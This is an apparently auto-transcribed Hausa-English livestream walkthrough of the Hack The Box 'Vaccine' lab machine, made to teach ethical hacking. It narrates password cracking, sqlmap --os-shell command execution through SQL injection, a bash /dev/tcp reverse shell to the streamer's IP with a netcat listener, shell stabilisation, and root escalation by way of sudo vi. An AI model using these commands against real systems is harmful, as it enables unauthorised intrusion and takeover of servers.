suka ce what is the password for the admin user on the website, and wannan shine muka samu using John the Ripper bayan mun yi cracking din shi kenan. So password din ya fara da 77 something, kamar yana da shi a cikin nan. Okay, bani da shi ba, amma akwai shi a cikin note din. Let me scroll up, shine 74 din nan bayan mun yi cracking din shi using John the Ripper idan ba ku manta ba, and za mu iya pasting a cikin browser din nan, amma kaman ba shi bane, sorry ba wannan bane, shine mai QWERTY din nan ne na yi pasting din shi. Okay, so bayan mun yi converting ko ce bayan mun yi cracking din shi using hashcat shine muka gano wannan. So ta yana gano wannan because a ƙarshe ya ga yana sa mana 9, so it's very very important to take note. Control V, and tax na shida shine Control S to save. Tax na shida suka ce what option can be passed to SQL map to try to get command execution via SQL injection. So shine wato ainihin tag os tag shell ba manta ba. Let me submit that. Wannan question din shine tag os shell, I guess, and it's also correct. So tags na gaba suka ce what program can the PostgreSQL user run as root. So wannan ba mu amsa shi ba because ba mu yi shi ba, shine tags na 7. So wani program ne PostgreSQL user zai iya running a matsayin root? So za mu iya yin haka ne ta hanyar running din sudo tag l. Yanzu ba what ya fitar da mu, what happened? Oh my god. So bari na sake running din command din nan, and ko muna kai ne yanzu. Okay, za mu sake running netcat din nan, and what nmap kuma me yake faruwa ne? Muna cikin tafiya lafiya kuma ya haka ya yake damu da nmap ne. Like, let me change this. So netcat lmvp 9999 ba 000 ba, 9999 guda hudu, sai mu danna enter. So za mu koma a mi running bash command din nan. So shine za mu ce bash tag c, sai mu amfani da code, sai mu ce bash tag I, and I believe we have to start afresh. Bash tag I, then we can say greater than, sai mu amfani da ampersand, sai mu ce /dev /tcp/ip ɗinmu wanda shine 10.10.15.97, na masa /port din shine 999, and we can close out of bash now, sai mu danna enter. So muka danna enter yana tambayar mu waya, mu ce just enter kawai. So ya kamata wannan ya karɓa mana, amma yana karɓa sai kuma ya fita. Me yake faruwa? To show you that it is not stable, in muka ce fg fa, like is it running as matsayin background? Well, it's not running still. I don't know why. So like, can I use the up arrow key? I don't know why this thing is not stable. Let me run that again. Bari mu ce yes yanzu, sai mu danna enter. Like yana karba kuma still ya fita. But me yasa hakan? So I don't know why we are having nmap anan sama. Can I close half of this? Like close, I don't need that. Split now. Netcat tag lmvp 9999, hit enter. Like go up there again, run that same command, hit enter. Yanzu zai karɓi mana ko ba zai karɓa ba? Yana cewa no output.
So like I don't know me yake faruwa, ko mashin din ta daina ne. Well, I think za mu iya restarting ɗinta ko me resetting. Let's reset. So wani zuban ka samu matsala irin wannan, best thing shine kai resetting, za su canza maka IP address, sai ka sake amfani da IP address ɗin kai duk wani abu da ya kamata ka yi ko abubuwan da duk muka yi. Malam Abdullahi Salisu Mubi a Salafi, muna maka barka da shan ruwa, fatan ka sha ruwa lafiya, barka da shigowa. So da duka alamu we have a new IP. Okay, still yana kokari yayi wannan. Do I have network problem? Hello, come on. So one of the disadvantage in yin stream kenan kana buga CTFs shine zaka dinga fuskanta matsala irin wannan, dole sai an jira, ba kamar mutum ya recording video ba kawai yayi content duk wani abu da baya bukata a cikin video. So but ina fatan you guys are enjoying the stream and kuma kun samu stream din of value. So this is what it takes to be an ethical hacker, a bug bounty hunter, or a cyber security researcher. So sanin duka wayannan abubuwan yakan ɗauki lokaci, amma ka sa a ranka cewa kaɗan ne zaka fahimci wayannan abubuwan. So duka wayannan abubuwan da nake yi, I believe it took me a while to understand the concept and tools da ake amfani da shi. Zan yi Ctrl C sai mu koma cikin terminal. I think I don't need this tab now. Tab din da nake bukata, then you Ctrl C a cikin shi, like can I exit? So za mu danna up arrow key, yanzu abin da kawai za mu canza shine IP address din, wanda shine wannan. Then you paste in sabon IP address din, kawai sai mu danna enter. So wannan kai tsaye, like do you want to follow, za mu danna enter, yi mana default kawai, ko sai mun canza cookies din ne. Are we using the OS shell? Okay, yes, we are using it. So as we can see, SQL map is doing its magic. But kafin ya gama bari na kokari kawai in rubuta wannan bash command din, in ce bash tag c, sai mu sa quote, then we can do bash tag I 0 ampersand, sorry kama akwai greater than, we can use greater than here, then slash dev tcp, then my IP which is 10.10.15.97 slash port shine 999, then I can close that. So abin da yasa na rubuta anan just to grab it, then you copy so that we don't need to waste time, because we have wasted a lot. So da duka alamu sai SQL ya sake ne a fresh, because this is the first time muke running SQL map akan wannan IP address. So maybe it has to go through and test the payloads, various payloads. So gashi nan ya gama. Maybe the session ID is different. Can we grab that again? Bari na sake kwafan IP ɗin kawai, sai na paste ɗin shi anan, amma kafin nan zan sa http /haka, then hit enter. Abin da yasa zan yi wannan, what Google kuma, that is not what I want.
amfanin saka http din kenan. Is that the IP? Like IP din ya canza. Oh, like na ga wani kuskure ɗaya shine space din da na ba tsakanin dashboard da wannan. I think this is the problem, so let me just run that ba tare da mu samu cookie din ba. I think it should be using the same session cookie ba tare da ya canza ba because it's the same machine. So ma assuming bai yi ba dole we have to redo that again. But idan yayi, we'll just go straight and paste our bash command, which I guessed. Does that mean we have to try that again? Well, not really. Or maybe we should try and paste the IP, hit enter. Sai mu sake login from the beginning since we have the credentials. User din shine admin and password din shine QWERTY menene 7 something something, which is this. Then paste it or slap it in here, sign in. So from here now we can grab the session cookie, which is PHP session ID. But bai dawo da komai ba because bai gama ba, and if okay, so I guess kaman ya canza cookie din. How can I copy this? Hello. Control C. Bari na stopping wannan gaba ɗaya. Control L to clear screen, then up arrow key. So ya canza mana cookie din ne. So za mu paste din sabon yanzu, then hit enter. I guess wannan zai yi. Do the default. So let me just get ready with this command, bash command. Control C. Do we still have the OS shell? Okay, muna da shi. Ya muna default. So like muna kokarin mu yi amfani da OS injection din nan. And here we go. So let me copy that one last time. Control C, run this, amma kafin na then enter mun tabbatar da netcat is listening. So
zamu danna enter. Do you want to retrieve the command standard input? Yi mana default kawai, and ya ce mana retrieved but no output. Why? Baya capturing. LSLA amu ce no. Gashi dai muna kan mashin din, kun ga yana lissafa mana duka abubuwan da muke ciki. So maybe from here zamu ci gaba da abubuwan, but it says like we don't have stable shell, saboda haka duk wani abu da zamu yi zai bamu wahala sosai. But based of my notes zamu LSLA akan /var uku /html sai mu danna enter. Ice mu ya mana default. So anan kusa ido, what we are looking for is dashboard din nan. Like yanzu muna dashboard, we can do Ctrl U dan muga page source din. Like na manta in yi wannan, and it's very very important. So nothing special here, but as you can see muna da dashboard.php and muna da license.txt. So if we try to cut dashboard.php and hit enter I'm gonna default, maybe you can guess something. So abinda muke nema is retrieved, no outputs. Why? Let me run that command again. Then yes yanzu. SQL query provided does not return any outputs because we are not stable. What else can we do? Bash command yaki. Maybe ko ban yi shi daidai bane. Okay, kama akwai abin da ban ƙara wanda shine zamu ce 0 greater than, zamu ce ampersand 1. I think one is very important. So let me hit enter now. Hit enter again, and does not return anything. So maybe ana. Okay. Ina ta yin kuskure fa. So we don't have this tag I. Yeah, haka ne kawai. Bari mu danna enter now. Hit enter again, and we have a connection. So let's try to stabilize our shell one last time using Python. A gurguje Python 3-c import pty semicolon, pty.spawn. Ya fitar da mu. Why is this thing closing? Let's try that one last time. Yes now. Okay, let me just copy it. Ina da shi a note ina. Then you paste in. Okay, so like let me Ctrl Z, say inside here run an stty, Ctrl V, say in FG, hit enter. Then we can do export term equals to x term. Ctrl V again, hit enter, and we have it already. So now like cd var cd html, then we can cut. We're not a full screen one. We can cut akan dashboard.php, hit enter. So like it's good,
mu duba wannan file din because it contains a password, as we can see, which is the user din Postgres, sorry, which has a DB name CardDB. So let me just copy the password, Ctrl C, and heading back to our notes, zamu ce mun samu like, where should I put in this? Mun samu user mai suna Postgres with this password. Go Ctrl S to save, I guess. So like now password din da muka samu shine na wannan user din. So now can we try and sudo tag L, sai mu danna enter, paste the password, hit enter again, domin mu ga abinda shi user din nan zai iya running a matsayin root, bai ma'ana a matsayin sudo kenan. Like zai iya amfani da sudo domin ya execute wani abu. So abin da ya je idona a nan shine like abin nan na ƙarshe, like ya ce mana user PostgreSQL ko kun ce Postgres may run the following commands on vaccine, shine /bin vi, vim kenan. Vim text editor ne, bai mana user din nan zai iya running vim akan wannan file din. Like we can say sudo /bin/vi akan wannan file din. So amma kafin nan, let me quickly do a Google search. So zamu je gtfobins.github.io, zamu search din suid akan vim ko vi domin mu ga command din kai tsaye. So a yanzu kada ku manta muna kokarin mu shiga root user ne, amma tambaya ce ta sa duka muke yin wannan abun. Samu rubuta vim kenan, then we can click on sudo a nan layin. So wannan zai nuna mana format din da ake amfani da shi. So idan ya nuna mana, we can use that to continue answering the questions. So yanzu a wannan matakin don ban manta ba, kawance kada na manta, za mu iya SSH into Postgres, akwai S, then mu ce at IP din. Okay, like tunda mun samu password din, zan danna enter. Bari na koma note ina dauko password din wanda shine wannan wannan kalma. Yana tambaye mu, are you sure you want to continue connecting? Mu ce yes. Zai tambaye mu password, sai mu paste din kawai. Ctrl V, hit enter, and yana ce mana password denied. Does that mean I didn't copy ko kuma post? Is that name correct? Okay, akwai T. Forgive me for that. But POS bane, akwai T. So let me try that one last time. Post. Haka, Ctrl L to clear screen, then danna enter. And ina da password na a clipboard dina, I can just go straight and Ctrl V, hit enter. Wannan zai shigar da mu machine din. Ina da 100% assurance, and here we go. Muna shiga wannan yana fita. So we don't even need this one anymore. Sai dai kawai zamu yi kokari mu elevating privilege mu tunda mun ga cewa wannan user din zai iya running din VI. And heading back to gtfobins, zamu je wajen sudo, kawai sai mu ce sudo vi tag c, then specifying this. So but kafin mu yi wannan, like we can try this method and this method too. So sai dai akan machine din idan muka ce sudo tag L, let me paste in password then hit enter. Like we can only run /vi, I'm going to /bin/vi, so much tag C maybe. But before we do that, let me copy this. Then the one file then call them here writing. So amma ya kamata mu saka sudo ba, because we're trying to run it as sudo. Sun ce sudo zai iya, like user din zai iya wannan.
Well, and here we go. Muna kokarin mu karanta file din yanzu kamar yadda muke gani, but following the syntax na GTF obins shine suka ce bayan kai vi zamu iya rubuta wannan, like ta yaya zamu iya rubuta wannan shine na farko zamu danna I insert kenan ko sai mi pasting. Can I paste? Well, bai yi ba. Bari na danna shift, sorry, na danna escape. Bari na danna shift in sa column, then I think we can continue this. Zamu ce set shell to this, I guess. Sai mu danna enter, right, and let's copy the last one. Say me Control V again, hit enter. Are we on? Nachi ID? Nothing. The abinda na yi ba. So let me try and clear all of that. Escape, shift this, which is set shell to equal to bin sh. And hit enter. Nothing is happening. So how do we overcome this? Like, maybe we should try taxi, direct haka. Maybe that's what we should do. Insert. How can we quit this? Escape, Control C. Like wancan kamar ya makale. So let me, like, how do I do this? SSH Postgres at the IP, then grab the password, which is p at s5 word exclamation. So something is not right. Maybe my network. Okay, yana tambayar mu password. Control V, hit enter. Then we can see sudo tag L. Then we can paste that. Oh, sorry. Control V, hit enter. And sudo tag L, hit enter. So, like, let's try that. I'm going /bin/vi tag C and /etc postgresql, I guess, /11, then pg underscore hba.conf. Ina son in bi syntax ɗinsu ne. Well,
let me hit enter on that. Error. And vim ne kawai ke kawo. Escape. Q. Let me remove tag C now. Hit enter. Ban yi abin daidai ba. Ko ban sa sudo bane. Okay, supposed to be sudo. Hit enter. Super user is not allowed to execute that as root on vaccine. Why? Okay, main. I didn't copy this thing correctly. Sudo /bin/vi. Then I can paste that. Hit enter, and here we go. So if I see set shell equals to /bin bash, hit enter. Go by enter ya kamata and then escape. Well, column. Okay, then now we can see shell kawai. Hit enter, and yeah, we are root. Muka ce id, we are root ls. And you see the root ls cat root.text cat root.txt. So shell length is not stable. We can copy that, and wannan shine wannan rom ɗin. So root Control V. Okay, sorry, Control S to save. That is that. So like in kaga yeah, Python 3 tag C. You can try all what we have been doing. Import pty. So when yana yi ne dole sai da Python akai pty.spawn image bracket, open bracket, double quote /bin sh or bash, ko ne ka ce lafiya launi. Mu je da bash na, close bracket, then close that single quote, sai mu danna enter, and we are root. Zamu iya clear yanzu ls lsla id. So that is that. So another important thing shine like mana the SSH file, like that is that about that. So let's quickly go back and answer the rest of the questions. Tambayoyin da bamu answer ba sun tambaye mu, what program can the PostgreSQL user run as root? Shine vi, I guess. Mama, I guess Bani is correct. So let's do that. Let me check vi, and tax na takwas shine suke tambayan mene, user flag. Okay, so like do I need to do that? Like I don't even need to do that. Let me just copy the flag. Tunda mun samu shi already. Control C to copy and Control V to paste. The mun san shine next. Control C to copy. Root flag yayi. Okay, then let's go to the root flag, Control V, submit flag, and this is it. Wannan shine vaccine. Mun riga da mun gama da wannan challenge ɗin. So duka wannan shine
episode na 11 game da Hack the Box series da muke yi, inda muka karkata akan tab din starting point wanda shine kaman waje wanda zaka fara like koyan Hack the Box ko koyan cyber security stuff a website din Hack the Box. So as you can see, vaccine has been pawned and this is the date. So if you like, we can share, and I will do that later, maybe after the stream. So duka wannan shine game da vaccine. I hope you guys have enjoyed the video and you can go through the notes. Kamar yadda kuke gani mun amsa duk wata tambaya da muka cikaro da ita. Control S to save, and that is that. So duka insha Allah wannan zan dakata da wannan video. Idan ka kasance sabo zuwa channel din mai albarka, muna roƙonka da kai like wannan video, ka taɓa mana subscribe button. Idan kuna tambaya ko wani ƙarin bayani ko kuma mun yi wani kuskure kaga ya kamata ku sanar da mu, za ku iya tuntuɓa mu a cikin comment section wannan video ko kuma a cikin description. Na'am, da wannan zan ce aqulu qawli hadha astaghfirullahi wa lakum. Assalamu alaikum wa rahmatullahi ta'ala wa barakatuh. Peace.